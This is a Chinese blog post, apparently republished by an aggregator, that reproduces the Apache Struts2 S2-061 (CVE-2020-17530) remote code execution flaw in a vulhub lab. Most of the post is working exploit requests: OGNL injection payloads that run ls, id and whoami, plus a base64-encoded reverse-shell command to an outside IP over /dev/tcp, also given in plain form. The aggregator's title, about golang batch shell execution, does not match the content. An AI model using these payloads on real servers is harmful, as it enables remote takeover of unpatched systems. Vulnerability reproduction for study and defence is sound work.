當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本（CVE202017530）...

發布時間：2024/7/23 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了 golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本（CVE202017530）... 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

聲明

由于傳播、利用此文所提供的信息或工具而造成的任何直接或者間接的后果及損失，均由使用者本人負責，博鴻科技安全服務中心以及文章作者不為此承擔任何責任。

0x00 軟件介紹

struts2：面向JAVA EE的一款java web開發框架

0x01 復現環境

使用環境：vulhub中的環境：https://github.com/vulhub/vulhub/tree/master/struts2/s2-061復現版本：Apache Struts 2.5.25

0x02 環境搭建

一臺云上的vpsgit clone?https://github.com/vulhub/vulhubcd ./vulhub/cd ./struts2/cd ./s2-061/systemctl start dockerdocker-compose up -d

0x03 利用條件

此次漏洞只是S2-059修復的一個繞過，并且本次利用的核心類org.apache.commons.collections.BeanMap在commons-collections-x.x.jar包中，但是在官方的最小依賴包中并沒有包含這個包。所以即使掃到了支持OGNL表達式的注入點，如果沒有使用這個依賴包，也還是沒辦法進行利用

0x04 影響版本

Apache Struts 2.0.0 - Struts 2.5.25

0x05 漏洞復現

攻擊環境：kali_x64_en-usEXP1(驗證漏洞是否存在)：http://ybdt.best:8080/?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d查看返回頁面的源碼，如下圖，包含“test2020”表示漏洞存在對于命令執行，目前網上有2種利用方式EXP2(第一種利用方式執行命令ls)：POST /index.action HTTP/1.1Host: ybdt.best:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 829------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ls")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}------WebKitFormBoundaryl7d1B1aGsV2wcZwF--如下圖，成功執行命令EXP3(第二種利用方式執行命令id)：POST /index.action HTTP/1.1Host: ybdt.best:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.1.110:8080/index.actionAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 1361------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="id"%{(#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))}------WebKitFormBoundaryl7d1B1aGsV2wcZwF--如下圖，成功執行命令EXP4(使用第一種利用方式反彈shell)：POST /index.action HTTP/1.1Host: ybdt.best:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 918------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNC45Mi4zNy4xODkvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}------WebKitFormBoundaryl7d1B1aGsV2wcZwF--執行后返回值為空，如下圖：成功反彈shell，如下圖：其中反彈shell的命令：bash -i >& /dev/tcp/34.92.37.189/1234 0>&1需要經過http://www.jackson-t.ca/runtime-exec-payloads.html這個在線編碼網站編碼轉化一下EXP5(以get方式執行命令)：?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27whoami%27}).(%23res%3d%23exec.exec(%23cmd))}成功執行命令，如下圖：

0x06?踩坑記錄

無

公眾號發送S2-061獲取批量檢測腳本

總結

以上是生活随笔為你收集整理的golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本（CVE202017530）...的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： mysql 一致性读_MySQL半一致性
下一篇： c语言借阅管理题目内容描述,C语言图书